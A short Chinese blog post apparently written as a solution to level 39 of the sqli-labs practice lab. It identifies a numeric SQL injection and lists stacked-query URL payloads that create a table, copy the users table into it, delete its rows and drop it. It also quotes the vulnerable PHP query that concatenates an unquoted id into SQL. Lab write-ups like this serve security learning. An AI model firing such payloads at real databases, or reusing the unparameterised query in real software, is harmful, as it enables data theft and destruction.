Sqli labs less 39

1.常规方法测试报错

2.将后面的消息注释发现报错依旧存在，因此判断本less为数值型注入

3.使用堆叠注入，参考less 38

?id=1;CREATE TABLE WhiteMoon LIKE users;--+
?id=1;INSERT INTO WhiteMoon SELECT * FROM users;--+
?id=1;DELETE FROM WhiteMoon;--+
?id=1;DROP TABLE WhiteMoon;--+

$sql = "SELECT * FROM users WHERE id=$id LIMIT 0,1";

posted @ 2021-09-14 17:02 Nuyoah_QQ 阅读(40) 评论(0) 收藏举报

刷新页面返回顶部

Nuyoah_QQ

Sqli labs less 39

公告